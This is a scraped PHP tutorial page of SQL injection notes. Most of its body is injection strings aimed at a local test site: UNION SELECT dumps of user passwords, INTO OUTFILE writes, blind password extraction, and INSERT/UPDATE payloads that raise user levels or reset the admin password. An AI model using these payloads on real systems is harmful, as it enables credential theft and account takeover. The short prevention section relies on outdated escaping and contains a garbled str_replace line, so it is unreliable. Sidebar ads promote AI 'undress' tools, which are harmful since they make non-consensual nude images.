SQL injection PHP SQL injection implementation test code security is good-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

SQL injection PHP SQL injection implementation test code security is good

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 29, 2016 am 08:44 AM

sql injection

The focus of SQL injection is to construct SQL statements. Only by flexibly using SQL
statements can we construct incredible injection strings. After studying, I wrote some notes and have them ready for use at any time. I hope you will understand the basic principles of SQL first when reading the following content. The code in the notes comes from the Internet.
===Basic part===
Query for this table:
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/ injection/user.php?username=angel' and LEFT(password,1)='m
Union union statement:
http://127.0.0.1/injection/show.php?id=1' union select 1,username, password from user/*
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
Export file:
http://127.0.0.1/injection/user .php?username=angel' into outfile 'c:/file.txt
http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
http: //127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
INSERT statement:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
Construct the homepage value as: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#' , '1');
UPDATE statement: I like this thing
Understand this SQL first
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE
If this SQL is modified to the following Form, the injection is realized
1: Modify the homepage value to
http://4ngel.net', userlevel='3
Then the SQL statement becomes
UPDATE user SET password='mypass', homepage='http:// 4ngel.net', userlevel='3' WHERE
userlevel is the user level
2: Modify the password value to
mypass)' WHERE username='admin'#
Then the SQL statement becomes
UPDATE user SET password='MD5(mypass )' WHERE username='admin'#)', homepage='$homepage' WHERE
3: Modify the id value to
' OR username='admin'
Then the SQL statement becomes
UPDATE user SET password='MD5($ password)', homepage='$homepage' WHERE OR username='admin'
===Advanced part===
Commonly used MySQL built-in functions
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER ()
database()
version()
SUBSTRING()
MID()
char()
load_file()
……
Function application
UPDATE article SET title=DATABASE() WHERE id=1
http:// 127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) Equivalent to angel, decimal
http ://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)> ;char(100)
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111
Determine the number and type of fields in the data structure
http ://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
http://127.0.0.1/injection/show.php?id=-1 union select char(97), char(97),char(97)
Guess the data table name
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members
Cross-table query to get user name and password
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1 from ymdown_user where id=1
Others
#Verify the first password
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
===Injection Prevention===
Server aspect
magic_quotes_gpc is set to On
display_errors is set to Off
Encoding aspect
$keywords = addslashes($keywords);
$keywords = str_replace("_","_",$keywords ; Inject
if (get_magic_quotes_gpc()) {
//....
}else{
$str = mysql_real_escape_string($str);
$keywords = str_replace("_","_",$keywords);
$ keywords = str_replace("%","%",$keywords);
}
Useful functions
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
addslashes()
Reference article :
http://www.4ngel.net/article/36.htm (SQL Injection with MySQL)中文
http://www.phpe.net/mysql_manual/06-4.html (MYSQL statement reference)
The above introduces SQL injection. PHP's SQL injection implementation test code is very safe, including the content of SQL injection. I hope it will be helpful to friends who are interested in PHP tutorials.

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

Repo: How To Revive Teammates

1 months ago By 尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hello Kitty Island Adventure: How To Get Giant Seeds

1 months ago By 尊渡假赌尊渡假赌尊渡假赌

How Long Does It Take To Beat Split Fiction?

4 weeks ago By DDD

R.E.P.O. Save File Location: Where Is It & How to Protect It?

4 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7369

Java Tutorial

1628

CakePHP Tutorial

1354

Laravel Tutorial

1266

PHP Tutorial

1214

Related knowledge

How to use exp for SQL error injection May 12, 2023 am 10:16 AM

0x01 Preface Overview The editor discovered another Double data overflow in MySQL. When we get the functions in MySQL, the editor is more interested in the mathematical functions. They should also contain some data types to save values. So the editor ran to test to see which functions would cause overflow errors. Then the editor discovered that when a value greater than 709 is passed, the function exp() will cause an overflow error. mysql>selectexp(709);+-----------------------+|exp(709)|+---------- ------------+|8.218407461554972

Nginx basic security knowledge: preventing SQL injection attacks Jun 10, 2023 pm 12:31 PM

Nginx is a fast, high-performance, scalable web server, and its security is an issue that cannot be ignored in web application development. Especially SQL injection attacks, which can cause huge damage to web applications. In this article, we will discuss how to use Nginx to prevent SQL injection attacks to protect the security of web applications. What is a SQL injection attack? SQL injection attack is an attack method that exploits vulnerabilities in web applications. Attackers can inject malicious code into web applications

PHP Programming Tips: How to Prevent SQL Injection Attacks Aug 17, 2023 pm 01:49 PM

PHP Programming Tips: How to Prevent SQL Injection Attacks Security is crucial when performing database operations. SQL injection attacks are a common network attack that exploit an application's improper handling of user input, resulting in malicious SQL code being inserted and executed. To protect our application from SQL injection attacks, we need to take some precautions. Use parameterized queries Parameterized queries are the most basic and most effective way to prevent SQL injection attacks. It works by comparing user-entered values with a SQL query

Detection and repair of PHP SQL injection vulnerabilities Aug 08, 2023 pm 02:04 PM

Overview of detection and repair of PHP SQL injection vulnerabilities: SQL injection refers to an attack method in which attackers use web applications to maliciously inject SQL code into the input. PHP, as a scripting language widely used in web development, is widely used to develop dynamic websites and applications. However, due to the flexibility and ease of use of PHP, developers often ignore security, resulting in the existence of SQL injection vulnerabilities. This article will introduce how to detect and fix SQL injection vulnerabilities in PHP and provide relevant code examples. check

How to prevent SQL injection attacks using PHP Jun 24, 2023 am 10:31 AM

In the field of network security, SQL injection attacks are a common attack method. It exploits malicious code submitted by malicious users to alter the behavior of an application to perform unsafe operations. Common SQL injection attacks include query operations, insert operations, and delete operations. Among them, query operations are the most commonly attacked, and a common method to prevent SQL injection attacks is to use PHP. PHP is a commonly used server-side scripting language that is widely used in web applications. PHP can be related to MySQL etc.

Laravel Development Notes: Methods and Techniques to Prevent SQL Injection Nov 22, 2023 pm 04:56 PM

Laravel Development Notes: Methods and Techniques to Prevent SQL Injection With the development of the Internet and the continuous advancement of computer technology, the development of web applications has become more and more common. During the development process, security has always been an important issue that developers cannot ignore. Among them, preventing SQL injection attacks is one of the security issues that requires special attention during the development process. This article will introduce several methods and techniques commonly used in Laravel development to help developers effectively prevent SQL injection. Using parameter binding Parameter binding is Lar

PHP form filtering: SQL injection prevention and filtering Aug 07, 2023 pm 03:49 PM

PHP form filtering: SQL injection prevention and filtering Introduction: With the rapid development of the Internet, the development of Web applications has become more and more common. In web development, forms are one of the most common ways of user interaction. However, there are security risks in the processing of form submission data. Among them, one of the most common risks is SQL injection attacks. A SQL injection attack is an attack method that uses a web application to improperly process user input data, allowing the attacker to perform unauthorized database queries. The attacker passes the

Strategies to deal with SQL injection vulnerabilities in PHP Aug 09, 2023 pm 03:09 PM

SQL injection is a common network attack method that uses the application's imperfect processing of input data to successfully inject malicious SQL statements into the database. This attack method is particularly common in applications developed using the PHP language, because PHP's handling of user input is usually relatively weak. This article will introduce some strategies for dealing with SQL injection vulnerabilities and provide PHP code examples. Using prepared statements Prepared statements are a recommended way to defend against SQL injection. It uses binding parameters to combine input data with

See all articles